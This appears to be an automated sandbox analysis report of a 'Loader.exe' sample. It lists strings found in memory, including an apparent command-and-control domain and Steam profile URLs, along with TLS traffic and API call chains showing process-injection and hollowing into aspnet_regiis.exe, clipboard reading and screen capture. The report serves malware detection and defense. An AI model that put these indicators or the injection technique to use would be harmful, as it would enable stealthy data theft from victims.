                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000354C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2150477826.00000000035EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2150287514.00000000035E9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2150852564.00000000035E9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081524747.000000000355C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiN
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003533000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: aspnet_regiis.exe, 00000003.00000002.2243704509.0000000005C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/s~
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/uo
                Source: aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/uo(h
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steamp
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.b
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900P
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.c
                Source: aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptc
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
                Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49710 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C63E30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C648C2 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt

                System Summary

                Source: Loader.exe, GetWin.cs | Large array initialization: GetWindowsOS: array initializer size 650240
                Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: 72C30000 page execute and read and write
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE28C20 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE26E60 GetModuleHandleW,NtQueryInformationProcess
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE20470
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE28C20
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE26E60
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE32CD0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE3E8A0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE4B090
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE24460
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE2EC60
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE3C840
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE4E040
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE3E050
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE11020
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE41000
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE35C10
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE45C10
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE4D410
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE185F0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE395F0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE48DF0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE2F5D0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE321D0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE3D1B0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE3A5B0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE30DB0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE4B990
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE46170
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE46540
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE3C150
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE31930
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE37530
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE2E500
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE4B500
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE31D10
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE2FEE0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE366C0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE312C0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE4BED0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE36AA0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE44AA0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE406B0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE496B0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE35280
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE3D660
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE4C660
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE46E60
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE49E70
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE47250
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE36E00
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE35E10
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE333E0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE327F0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE3ABC0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE1FFA0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE33BB0
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE44380
